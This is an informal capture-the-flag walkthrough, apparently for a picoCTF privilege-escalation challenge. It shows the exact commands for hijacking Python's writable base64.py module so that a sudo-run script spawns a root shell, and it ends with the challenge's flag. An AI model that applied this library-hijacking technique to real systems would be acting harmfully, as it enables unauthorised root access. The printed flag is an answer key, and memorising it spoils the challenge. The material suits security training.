this is a privelege escalation problem
    we have to ssh into the server as a picoctf user
        ssh picoctf@saturn.picoctf.net -p 65490
    now we can explore the system
        ls -al
        sudo -l
            we get a .server.py file which can be executed as root
                we cannot write to this file
            in this python file we see that the host name is invalid(we can run this file and see the error)\
                file:///home/ayush/Pictures/Screenshots/Screenshot%20from%202023-04-28%2022-08-28.png
            we are also using import base64/os/socket modules 
            these modules are stored in the system in location
                python3 
                    import sys
                    print(sys.path)
                        this cones up in the output '/usr/lib/python3.8'

            we can explore the lib folder and see if we can edit these import modules   
                ls -al /usr/lib/python3.8/os.py
                ls -al /usr/lib/python3.8/socket.py
                ls -al /usr/lib/python3.8/base64.py
            we can edit /usr/lib/python3.8/base64.py
        we can add this to execute(import will just add the lines of code in the module in the start of the program)
            we can now edit the /usr/lib/python3.8/base64.py file to run any python code as root
        vi /usr/lib/python3.8/base64.py
            import os
            os.system('whoami')
            os.system('/bin/sh')
        sudo  /usr/bin/python3 /home/picoctf/.server.py
            we will need to type this exact cmd otherwise I am getting this error
                Sorry, user picoctf is not allowed to execute '/usr/bin/python3 .server.py' as root on challenge.
            this will spawn a root shell
                cd /root
                ls -al
                cat .flag.txt

flag - picoCTF{pYth0nn_libraryH!j@CK!n9_5a7b5866}




